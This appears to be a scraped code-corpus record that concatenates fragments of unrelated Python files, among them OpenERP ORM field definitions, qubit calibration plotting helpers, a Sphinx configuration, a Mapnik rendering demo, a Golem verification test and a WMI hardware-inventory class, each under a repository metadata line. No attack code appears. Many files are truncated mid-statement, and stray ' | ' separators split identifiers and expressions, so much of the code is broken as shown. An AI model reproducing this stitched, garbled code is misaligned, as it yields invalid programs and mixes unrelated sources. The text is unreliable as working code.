if x == 0:
y += 4
p.scatter(random(N)+2*x, random(N)+y, marker=marker, size=14,
line_color="navy", fill_color="orange", alpha=0.5)
p.text(2*x+0.5, y+2.5, text=[marker],
text_color="firebrick", text_align="center", text_font_size="13px")
output_file("markers.html", title="markers.py example")
show(p) # open a browser
|
Ichag/openerp-server | openerp/osv/fields.py | Python | agpl-3.0 | 69,883 | 0.005023 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" Fields:
- simple
- relations (one2many, many2one, many2many)
- function
Fields Attributes:
* _classic_read: is a classic sql fields
* _type : field type
* _auto_join: for one2many and many2one fields, tells whether select
queries will join the relational table instead of replacing the
field condition by an equivalent-one based on a search.
* readonly
* required
* size
"""
import base64
import datetime as DT
import logging
import pytz
import re
import xmlrpclib
from psycopg2 import Binary
import openerp
import openerp.tools as tools
from openerp.tools.translate import _
from openerp.tools import float_round, float_repr
from openerp.tools import html_sanitize
import simplejson
from openerp import SUPERUSER_ID
_logger = logging.getLogger(__name__)
def _symbol_set(symb):
if symb is None or symb == False:
return None
elif isinstance(symb, unicode):
return symb.encode('utf-8')
return str(symb)
class _column(object):
""" Base of all fields, a database column
An instance of this object is a *description* of a database column. It will
not hold any data, but only provide the methods to manipulate data of an
ORM record or even prepare/update the database to hold such a field of data.
"""
_classic_read = True
_classic_write = True
_auto_join = False
_prefetch = True
_properties = False
_type = 'unknown'
_obj = None
_multi = False
_symbol_c = '%s'
_symbol_f = _symbol_set
_symbol_set = (_symbol_c, _symbol_f)
_symbol_get = None
# used to hide a certain field type in the list of field types
_deprecated = False
def __init__(self, string='unknown', required=False, readonly=False, domain=None, context=None, states=None, priority=0, change_default=False, size=None, ondelete=None, translate=False, select=False, manual=False, **args):
"""
The 'manual' keyword argument specifies if the field is a custom one.
It corresponds to the 'state' column in ir_model_fields.
"""
if domain is None:
domain = []
if context is None:
context = {}
self.states = states or {}
self.string = string
self.readonly = readonly
self.required = required
self.size = size
self.help = args.get('help', '')
self.priority = priority
self.change_default = change_default
self.ondelete = ondelete.lower() if ondelete else None # defaults to 'set null' in ORM
self.translate = translate
self._dom | ain = domai | n
self._context = context
self.write = False
self.read = False
self.select = select
self.manual = manual
self.selectable = True
self.group_operator = args.get('group_operator', False)
self.groups = False # CSV list of ext IDs of groups that can access this field
self.deprecated = False # Optional deprecation warning
for a in args:
setattr(self, a, args[a])
def restart(self):
pass
def set(self, cr, obj, id, name, value, user=None, context=None):
cr.execute('update '+obj._table+' set '+name+'='+self._symbol_set[0]+' where id=%s', (self._symbol_set[1](value), id))
def get(self, cr, obj, ids, name, user=None, offset=0, context=None, values=None):
raise Exception(_('undefined get method !'))
def search(self, cr, obj, args, name, value, offset=0, limit=None, uid=None, context=None):
ids = obj.search(cr, uid, args+self._domain+[(name, 'ilike', value)], offset, limit, context=context)
res = obj.read(cr, uid, ids, [name], context=context)
return [x[name] for x in res]
def as_display_name(self, cr, uid, obj, value, context=None):
"""Converts a field value to a suitable string representation for a record,
e.g. when this field is used as ``rec_name``.
:param obj: the ``BaseModel`` instance this column belongs to
:param value: a proper value as returned by :py:meth:`~openerp.orm.osv.BaseModel.read`
for this column
"""
# delegated to class method, so a column type A can delegate
# to a column type B.
return self._as_display_name(self, cr, uid, obj, value, context=None)
@classmethod
def _as_display_name(cls, field, cr, uid, obj, value, context=None):
# This needs to be a class method, in case a column type A as to delegate
# to a column type B.
return tools.ustr(value)
# ---------------------------------------------------------
# Simple fields
# ---------------------------------------------------------
class boolean(_column):
_type = 'boolean'
_symbol_c = '%s'
_symbol_f = lambda x: x and 'True' or 'False'
_symbol_set = (_symbol_c, _symbol_f)
def __init__(self, string='unknown', required=False, **args):
super(boolean, self).__init__(string=string, required=required, **args)
if required:
_logger.debug(
"required=True is deprecated: making a boolean field"
" `required` has no effect, as NULL values are "
"automatically turned into False. args: %r",args)
class integer(_column):
_type = 'integer'
_symbol_c = '%s'
_symbol_f = lambda x: int(x or 0)
_symbol_set = (_symbol_c, _symbol_f)
_symbol_get = lambda self,x: x or 0
def __init__(self, string='unknown', required=False, **args):
super(integer, self).__init__(string=string, required=required, **args)
class reference(_column):
_type = 'reference'
_classic_read = False # post-process to handle missing target
def __init__(self, string, selection, size=None, **args):
_column.__init__(self, string=string, size=size, selection=selection, **args)
def get(self, cr, obj, ids, name, uid=None, context=None, values=None):
result = {}
# copy initial values fetched previously.
for value in values:
result[value['id']] = value[name]
if value[name]:
model, res_id = value[name].split(',')
if not obj.pool[model].exists(cr, uid, [int(res_id)], context=context):
result[value['id']] = False
return result
@classmethod
def _as_display_name(cls, field, cr, uid, obj, value, context=None):
if value:
# reference fields have a 'model,id'-like value, that we need to convert
# to a real name
model_name, res_id = value.split(',')
if model_name in obj.pool and res_id:
model = obj.pool[model_name]
return model.name_get(cr, uid, [int(res_id)], context=context)[0][1]
return tools.ustr(value)
# takes a string (encoded in utf8) and returns a string (encoded in utf8)
def _symbol_set_char(self, symb):
#TODO:
# * we need to remove the "symb==False" from the next line BUT
# for now too many things rely on this broken behavior
# * the symb==None test should be common to al |
McDermott-Group/LabRAD | LabRAD/TestScripts/fpgaTest/pyle/pyle/dataking/squid.py | Python | gpl-2.0 | 19,393 | 0.009075 | from Queue import Empty
from multiprocessing import Process, Queue
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import widget | s
from scipy import interpolate
from labrad.units import Unit
V, mV, us, GHz, rad = [Unit(s) for s in ('V', 'mV', 'us', 'GHz', 'rad')]
from pyle.dataking import utilMultilevels as ml
from pyle.fitting import fitting
def adjust_s_scanning(qubit, data, qnd=False):
f, phase = data.T
traces = [{'x':f, 'y': phase, 'args':('b.',)}]
if qnd:
params = [{'name': 'qnd_readout frequency', 'val': qubit['qnd_readout frequency'][ | GHz], 'range': (min(f),max(f)), 'axis': 'x', 'color': 'b'}]
else:
params = [{'name': 'readout frequency', 'val': qubit['readout frequency'][GHz], 'range': (min(f),max(f)), 'axis': 'x', 'color': 'b'}]
result = adjust(params, traces)
if result is not None:
if qnd:
qubit['qnd_readout frequency'] = result['qnd_readout frequency']*GHz
else:
qubit['readout frequency'] = result['readout frequency']*GHz
def adjust_phase(qubit, data):
fb, left, right = data.T
traces = [{'x': fb, 'y': left, 'args': ('b.',)},
{'x': fb, 'y': right, 'args': ('r.',)}]
params = [{'name':'adc adjusted phase', 'val': qubit['adc adjusted phase'][rad], 'range':(-np.pi, np.pi), 'axis':'y', 'color': 'b'}]
result = adjust(params, traces)
if result is not None:
qubit['adc adjusted phase'] = (-2 - result['adc adjusted phase'])*rad + qubit['adc adjusted phase']
if qubit['adc adjusted phase']>np.pi:
qubit['adc adjusted phase'] = qubit['adc adjusted phase']-2*np.pi
elif qubit['adc adjusted phase']<-np.pi:
qubit['adc adjusted phase'] = qubit['adc adjusted phase']+2*np.pi
def adjust_phase_arc(qubit, data):
fb, left, right = data.T
traces = [{'x': fb, 'y': left, 'args': ('b.',)},
{'x': fb, 'y': right, 'args': ('r.',)}]
params = [{'name': 'operate', 'val': qubit['biasOperate'][V], 'range': (-2.5,2.5), 'axis': 'x', 'color': 'b'},
{'name': 'readout', 'val': qubit['biasReadout'][V], 'range': (-2.5,2.5), 'axis': 'x', 'color': 'g'},
{'name': 'reset0', 'val': qubit['biasReset'][0][V], 'range': (-2.5,2.5), 'axis': 'x', 'color': 'r'},
{'name': 'reset1', 'val': qubit['biasReset'][1][V], 'range': (-2.5,2.5), 'axis': 'x', 'color': 'm'},
{'name': 'Phase', 'val': qubit['critical phase'][rad], 'range': (-np.pi,np.pi), 'axis': 'y', 'color': 'k'}]
result = adjust(params, traces)
if result is not None:
qubit['biasOperate'] = result['operate']*V
qubit['biasReadout'] = result['readout']*V
qubit['biasReset'] = [result['reset0']*V, result['reset1']*V] * 2
qubit['critical phase'] = result['Phase']*rad
def adjust_squid_steps(qubit, data):
fb, low, high = data.T
traces = [{'x': fb, 'y': low, 'args': ('b.',)},
{'x': fb, 'y': high, 'args': ('r.',)}]
params = [{'name': 'operate', 'val': qubit['biasOperate'][V], 'range': (-2.5,2.5), 'axis': 'x', 'color': 'b'},
{'name': 'readout', 'val': qubit['biasReadout'][V], 'range': (-2.5,2.5), 'axis': 'x', 'color': 'g'},
{'name': 'reset0', 'val': qubit['biasReset'][0][V], 'range': (-2.5,2.5), 'axis': 'x', 'color': 'r'},
{'name': 'reset1', 'val': qubit['biasReset'][1][V], 'range': (-2.5,2.5), 'axis': 'x', 'color': 'm'},
{'name': 'timing0', 'val': qubit['squidSwitchIntervals'][0][0][us], 'range': (0,60), 'axis': 'y', 'color': 'k'},
{'name': 'timing1', 'val': qubit['squidSwitchIntervals'][0][1][us], 'range': (0,60), 'axis': 'y', 'color': 'gray'},
{'name': 'Edge_left', 'val': qubit['squidEdges'][0][V], 'range': (-2.5,2.5), 'axis': 'x', 'color': 'g'},
{'name': 'Edge_right', 'val': qubit['squidEdges'][1][V], 'range': (-2.5,2.5), 'axis': 'x', 'color': 'r'}]
result = adjust(params, traces)
if result is not None:
qubit['biasOperate'] = result['operate']*V
qubit['biasReadout'] = result['readout']*V
qubit['biasReset'] = [result['reset0']*V, result['reset1']*V] * 2
qubit['squidSwitchIntervals'] = [(result['timing0']*us, result['timing1']*us)]
qubit['squidEdges'] = [result['Edge_left']*V,result['Edge_right']*V] #mark the edge of two branches of the same color. Converts voltage-to-Phi_not
def adjust_time(data):
t, probs = data[:,0], data[:,1:].T
traces = [{'x': t, 'y': prob, 'args': ('.-',)} for prob in probs]
params = [{'name': 't', 'val': (min(t)+max(t))/2, 'range': (min(t), max(t)), 'axis': 'x', 'color': 'b'}]
result = adjust(params, traces)
if result is not None:
return result['t']
def adjust_operate_bias(qubit, data):
fb, prob = data.T
traces = [{'x': fb, 'y': prob, 'args': ('b.-',)}]
params = [{'name': 'fb', 'val': qubit['biasOperate'][mV], 'range': (min(fb),max(fb)), 'axis': 'x', 'color': 'b'},
{'name': 'step', 'val': qubit['biasStepEdge'][mV], 'range': (min(fb),max(fb)), 'axis': 'x', 'color': 'r'}]
result = adjust(params, traces)
if result is not None:
qubit['biasOperate'] = result['fb']*mV
qubit['biasStepEdge'] = result['step']*mV
def adjust_scurve(qubit, data, states):
colors = ['b','g','r','c','m','y','k']
keynames=['measureAmp']+['measureAmp'+str(i) for i in list(np.arange(2,max(max(states)+2,2)))]
mpa, probs = data.T[0], data.T[1:]
traces = [{'x': mpa, 'y': prob, 'args': ('.-',)} for prob in probs]
params = [{'name': 'mpa'+str(state+1), 'val': float(qubit[keynames[state]]), 'range': (min(mpa),max(mpa)), 'axis': 'x', 'color': colors[state]} for state in states]
result = adjust(params, traces)
if result is not None:
for state in states:
qubit[keynames[state]] = result['mpa'+str(state+1)]
def adjust_visibility(qubit, data, states):
numstates=len(states)
mpas, probs, visis = data.T[0], data.T[1:numstates], data.T[numstates:]
colors = ['b','g','r','c','m','y','k']
keynames=['measureAmp']+['measureAmp'+str(i) for i in list(np.arange(2,max(max(states)+1,2)))]
#We have to make sure that the mpa axis is monotonically increasing for scipy.interpolation.interp1d to work properly
if mpas[0]>mpas[-1]: #If mpas runs negatively
mpas = mpas[::-1] #Reverse it's order
probs = probs[:,::-1] #and also reverse the order of the probabilities.
visis = visis[:,::-1] #and also reverse the order of the visibilities.
traces = [{'x':mpas, 'y':vis, 'args': ('.-',)} for vis in visis]+[{'x':mpas, 'y':prob, 'args': ('.-',)} for prob in probs]
params = [{'name':'mpa'+str(state), 'val': float(qubit[keynames[state-1]]), 'range': (min(mpas),max(mpas)), 'axis': 'x', 'color': colors[state-1]} for state in states[1:]]
result = adjust(params, traces)
if result is not None:
for state in states[1:]:
qubit[keynames[state-1]] = result['mpa'+str(state)]
def adjust_frequency(qubit, data, paramName=None):
if paramName is None:
paramName = 'f10'
f, prob = data.T
traces = [{'x': f, 'y': prob, 'args': ('b.-',)}]
params = [{'name': paramName, 'val': qubit[paramName][GHz], 'range': (min(f),max(f)), 'axis': 'x', 'color': 'b'}]
result = adjust(params, traces)
if result is not None:
qubit[paramName] = result[paramName]*GHz
def adjust_frequency_02(qubit, data):
f10 = qubit['f10'][GHz]
f21 = qubit['f21'][GHz]
f20_2ph = (f21 + f10) / 2
f, probs = data.T[0], data.T[1:]
traces = [{'x': f, 'y': prob, 'args': ('.-',)} for prob in probs]
params = [{'name': 'f10', 'val': f10, 'range': (min(f),max(f)), 'axis': 'x', 'color': 'b'},
{'name': 'f20_2ph', 'val': f20_2ph, 'range': (min(f),max(f)), 'axis': 'x', 'color': 'r'}]
result = adjust(params, traces)
if result is not None:
f10 = result['f10']
f20_2ph = result['f20_2ph']
f21 = 2*f20_2ph - f10
qubit['f10'] = f10*GHz
qubit['f21'] = f21*GHz
def adjust_fc(qubit, data):
f10 = qubit['f10'][G |
DataSploit/datasploit | emails/__init__.py | Python | gpl-3.0 | 380 | 0.005263 | from os.path import dirname, | basename, isfile, abspath
import glob, importlib, sys
modules = glob.glob(dirn | ame(__file__) + "/email_*.py")
__all__ = [basename(f)[:-3] for f in modules if isfile(f)]
sys.path.append(dirname(abspath(__file__)))
for m in __all__:
__import__(m, locals(), globals())
del m, f, dirname, basename, isfile, abspath, glob, importlib, sys, modules
|
googleapis/python-domains | docs/conf.py | Python | apache-2.0 | 12,378 | 0.000566 | # -*- coding: utf-8 -*-
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# google-cloud-domains documentation build configuration file
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath(".."))
# For plugins that can not read conf.py.
# See also: https://github.com/docascode/sphinx-docfx-yaml/issues/85
sys.path.insert(0, os.path.abspath("."))
__version__ = ""
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = "1.5.5"
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.autosummary",
"sphinx.ext.intersphinx",
"sphinx.ext.coverage",
"sphinx.ext.doctest",
"sphinx.ext.napoleon",
"sphinx.ext.todo",
"sphinx.ext.viewcode",
"recommonmark",
]
# autodoc/autosummary flags
autoclass_content = "both"
autodoc_default_options = {"members": True}
autosummary_generate = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = [".rst", ".md"]
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The root toctree document.
root_doc = "index"
# General information about the project.
project = "google-cloud-domains"
copyright = "2019, Google"
author = "Google APIs"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The full version, including alpha/beta/rc tags.
release = __version__
# The short X.Y version.
version = ".".join(release.split(".")[0:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = [
"_build",
"**/.nox/**/*",
"samples/AUTHORING_GUIDE.md",
"samples/CONTRIBUTING.md",
"samples/snippets/README.rst",
]
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "alabaster"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
"description": "Google Cloud Client Libraries for google-cloud-domains",
"github_user": "googleapis",
"github_repo": "python-domains",
"github_banner": True,
"font_family": "'Roboto', Georgia, sans",
"head_font_family": "'Roboto', Georgia, serif",
"code_font_family": "'Roboto Mono', 'Consolas', monospace",
}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The | value of this option must be the
# base URL from which the finished HTML is served.
# html_use_o | pensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
# html_search |
h4ck3rm1k3/MapNickAutotools | demo/test/textspacing.py | Python | lgpl-2.1 | 2,565 | 0.008577 | # $Id: rundemo.py 577 2008-01-03 11:39:10Z artem $
#
# This file is part of Mapnik (c++ mapping toolkit)
# Copyright (C) 2005 Jean-Francois Doyon
#
# Mapnik is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# Import everything. In this case this is safe, in more complex systems, you
# will want to be more selective.
try:
from mapnik import *
except:
print '\n\nThe mapnik library and python bindings must have been compiled and \
installed s | uccessfully before running this script.\n\n'
raise
m = Map(690,690,"+proj=latlong +ellps=WGS84")
m.background = Color(255,100,100,255)
road_style = Style()
#Road
road_rule = Rule()
road_stroke = Stroke(Color('white'), 12)
road_stroke.line_cap = line_cap.ROUND_CAP
road_ | stroke.line_join = line_join.ROUND_JOIN
#road_rule.filter = Filter("[CLASS] = 'STRAIGHT'")
road_rule.symbols.append(LineSymbolizer(road_stroke))
road_style.rules.append(road_rule);
#Road text
text_symbolizer = TextSymbolizer('NAME', 'DejaVu Sans Book', 10, Color('black'))
text_symbolizer.label_placement=label_placement.LINE_PLACEMENT
text_symbolizer.minimum_distance = 0
#text_symbolizer.max_char_angle_delta = 40
#text_symbolizer.force_odd_labels = 1
text_symbolizer.label_spacing = 80
text_symbolizer.label_position_tolerance = 5
text_symbolizer.avoid_edges = 0
text_symbolizer.halo_fill = Color('yellow')
text_symbolizer.halo_radius = 1
road_rule = Rule()
#road_rule.filter = Filter("[CLASS] = 'STRAIGHT'")
road_rule.symbols.append(text_symbolizer)
road_style.rules.append(road_rule)
road_layer = Layer('road')
road_layer.datasource = Shapefile(file='../data/test/textspacing')
m.append_style('road', road_style)
road_layer.styles.append('road')
m.layers.append(road_layer)
# Draw map
# Set the initial extent of the map.
m.zoom_to_box(Box2d(0,0,14,-14))
# Render
im = Image(m.width,m.height)
render(m, im)
# Save image to file
save_to_file('output.png', 'png',im) # true-colour RGBA
print "Done\n"
|
datagrok/python-misc | datagrok/django/middleware/__init__.py | Python | agpl-3.0 | 29 | 0 | """Middleware for Django."" | "
| |
Radagast-red/golem | tests/apps/core/task/test_core_verificator.py | Python | gpl-3.0 | 3,320 | 0.003614 | from mock import Mock
from golem.testutils import TempDirFixture
from golem.tools.assertlogs import LogTestCase
from apps.core.task.verificator import CoreVerificator, SubtaskVerificationState, logger
class TestCoreVerificator(TempDirFixture, LogTestCase):
def _fill_with_states(self, cv):
cv.ver_states["SUBTASK UNKNOWN"] = SubtaskVerificationState.UNKNOWN
cv.ver_states["SUBTASK WAITING"] = SubtaskVerificationState.WAITING
cv.ver_states["SUBTASK PARTIALLY VERIFIED"] = SubtaskVerificationState.PARTIALLY_VERIFIED
cv.ver_states["SUBTASK VERIFIED"] = SubtaskVerificationState.VERIFIED
cv.ver_states["SUBTASK WRONG_ANSWER"] = SubtaskVerificationState.WRONG_ANSWER
cv.ver_states["another_verified"] = SubtaskVerificationState.VERIFIED
def test_is_verified(self):
cv = CoreVerificator()
assert not cv.is_verified("SUBTASKWHENNOSUBTASKKNOWN")
self._fill_with_states(cv)
assert not cv.is_verified("COMPLETELY UNKNOWN")
assert not cv.is_verified("SUBTASK UNKNOWN")
assert not cv.is_verified("SUBTASK PARTIALLY VERIFIED")
assert not cv.is_verified("SUBTASK WRONG ANSWER")
assert cv.is_verified("SUBTASK VERIFIED")
assert cv.is_verified("another_verified")
def test_verification_state(self):
cv = CoreVerificator()
with self.assertLogs(logger, level="WARNING"):
assert cv.get_verification_state("SUBTASKWHENNOSUBTASKKNOWN") == \
SubtaskVerificationState.UNKNOWN
self._fill_with_states(cv)
with self.assertLogs(logger, level="WARNING"):
assert cv.get_verification_state("COMPLETELY UNKNOWN") == \
SubtaskVerificationState.UNKNOWN
with self.assertNoLogs(logger, level="WARNING"): |
assert cv.get_verification_state("SUBTASK UNKNOWN") == \
SubtaskVerificationState.UNKNOWN
assert cv.get_verification_state("SUBTASK PARTIALLY VERIFIED") == \
SubtaskVerificationState.PARTIALLY_VERIFIED
assert cv.get_verification_state("SUBTASK WRONG_ANSWER" | ) == \
SubtaskVerificationState.WRONG_ANSWER
assert cv.get_verification_state("another_verified") == \
SubtaskVerificationState.VERIFIED
assert cv.get_verification_state("SUBTASK VERIFIED") == \
SubtaskVerificationState.VERIFIED
def test_check_files(self):
cv = CoreVerificator()
cv._check_files("SUBTASK X", dict(), [], Mock())
assert cv.get_verification_state("SUBTASK X") == SubtaskVerificationState.WRONG_ANSWER
files = self.additional_dir_content([3])
cv._check_files("SUBTASK X2", dict(), files, Mock())
assert cv.get_verification_state("SUBTASK X2") == SubtaskVerificationState.VERIFIED
files = self.additional_dir_content([3])
cv._check_files("SUBTASK Y", dict(), [files[0]], Mock())
assert cv.get_verification_state("SUBTASK Y") == SubtaskVerificationState.VERIFIED
cv._check_files("SUBTASK Z", dict(), ["not a file"], Mock())
assert cv.get_verification_state("SUBTASK Z") == SubtaskVerificationState.WRONG_ANSWER
|
crutchcorn/WMIControl | machineclasses/WMIMachineClass.py | Python | mpl-2.0 | 6,411 | 0.004212 | # Core imports
from lib.setSettings import djangopath
djangopath(up=1, settings='settings')
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# DB models and exceptions
from data import models
from machineclasses.MachineClass import Machine
class WMIMachine(Machine):
def lookupWMICPU(self, cpu):
archName, createdArch = models.WMICodes.objects.get_or_create(code=cpu.Architecture, identifier="Architecture",
wmiObject="Win32_Processor")
familyName, createdFamily = models.WMICodes.objects.get_or_create(code=cpu.Family, identifier="Family",
wmiObject="Win32_Processor")
upgradeName, createdUpgrade = models.WMICodes.objects.get_or_create(code=cpu.UpgradeMethod,
identifier="UpgradeMethod",
wmiObject="Win32_Processor")
if createdArch:
archName.machines.add(self.machine)
if createdFamily:
familyName.machines.add(self.machine)
if createdUpgrade:
upgradeName.machines.add(self.machine)
try:
PartNumber = cpu.PartNumber.strip()
except AttributeError:
PartNumber = None
try:
SerialNumber = cpu.SerialNumber.strip()
except AttributeError:
SerialNumber = None
return archName, familyName, upgradeName, PartNumber, SerialNumber
def createWMICPU(self, cpu):
archName, familyName, upgradeName, PartNumber, SerialNumber = self.lookupWMICPU(cpu)
return self.createCPU(
name=cpu.Name.strip(),
manufacturer=cpu.Manufacturer,
partnum=PartNumber,
arch=archName.name,
family=familyName.name,
upgradeMethod=upgradeName.name,
cores=cpu.NumberOfCores,
threads=cpu.ThreadCount,
speed=cpu.MaxClockSpeed,
serial=SerialNumber,
location=cpu.DeviceID
)
def lookupWMIRAM(self, ram):
formName, createdForm = models.WMICodes.objects.get_or_create(code=ram.FormFactor, identifier="FormFactor",
wmiObject="Win32_PhysicalMemory")
memTypeName, createdMemType = models.WMICodes.objects.get_or_create(code=ram.MemoryType,
identifier="MemoryType",
wmiObject="Win32_PhysicalMemory")
if createdForm:
formName.machines.add(self.machine)
if createdMemType:
memTypeName.machines.add(self.machine)
# Clean data and test if exists all at once. WMI returns some weird stuff, don't judge
try:
PartNumber = ram.PartNumber.strip()
except AttributeError:
PartNumber = None
try:
SerialNumber = ram.SerialNumber.strip()
except AttributeError:
SerialNumber = None
return formName, memTypeName, PartNumber, SerialNumber
def createWMIRAM(self, ram):
formName, memTypeName, PartNumber, SerialNumber = self.lookupWMIRAM(ram)
return self.createRAM(
size=int(ram.Capacity),
manufacturer=ram.Manufacturer | ,
partnum=PartNumber,
speed=ram.Speed,
formFactor=formNam | e.name,
memoryType=memTypeName.name,
serial=SerialNumber,
location=ram.DeviceLocator
)
def lookupWMIGPU(self, gpu):
vidArchName, createdVidArch = models.WMICodes.objects.get_or_create(code=gpu.VideoArchitecture,
identifier="VideoArchitecture",
wmiObject="Win32_VideoController")
memTypeName, createdMemType = models.WMICodes.objects.get_or_create(code=gpu.VideoMemoryType,
identifier="VideoMemoryType",
wmiObject="Win32_VideoController")
if createdVidArch:
vidArchName.machines.add(self.machine)
if createdMemType:
memTypeName.machines.add(self.machine)
return vidArchName.name, memTypeName.name
def createWMIGPU(self, gpu):
vidArchName, memTypeName = self.lookupWMIGPU(gpu)
return self.createGPU(
name=gpu.Name.strip(),
size=int(gpu.AdapterRAM),
refresh=gpu.MaxRefreshRate,
arch=vidArchName,
memoryType=memTypeName,
location=gpu.DeviceID
)
def createWMILAN(self, net):
return self.createLAN(
name=net.Name.strip(),
manufacturer=net.Manufacturer,
mac=net.MACAddress,
location=net.DeviceID
)
def createWMIDrive(self, disk):
return self.createDrive(
name=disk.Model,
size=disk.Size,
interface=disk.InterfaceType,
manufacturer=disk.Manufacturer,
serial=disk.SerialNumber,
partitions=disk.Partitions
)
def createWMILogicDisk(self, disk, logicdisk):
disktype = self.lookupWMILogicDisk(disktype=logicdisk.DriveType)
return self.createLogicDisk(
disk=disk,
name=logicdisk.Name,
mount=logicdisk.DeviceID,
filesystem=logicdisk.FileSystem,
size=logicdisk.Size,
freesize=logicdisk.FreeSpace,
disktype=disktype
)
def lookupWMILogicDisk(self, disktype):
driveTypeName, createdDriveType = models.WMICodes.objects.get_or_create(code=disktype,
identifier="DriveType",
wmiObject="Win32_LogicalDisk")
if createdDriveType:
driveTypeName.machines.add(self.machine)
return driveTypeName.name
|
qedsoftware/commcare-hq | corehq/util/spreadsheets/excel_importer.py | Python | bsd-3-clause | 1,783 | 0.001683 | from corehq.util.spreadsheets.excel import WorkbookJSONReader
from soil import DownloadBase
class UnknownFileRefException(Exception):
pass
class ExcelImporter(object):
"""
Base class for `SingleExcelImporter` and `MultiExcelImporter`.
This is not meant to be used directly.
"""
def __init__(self, task, file_ref_id):
self.task = task
self.progress = 0
if self.task:
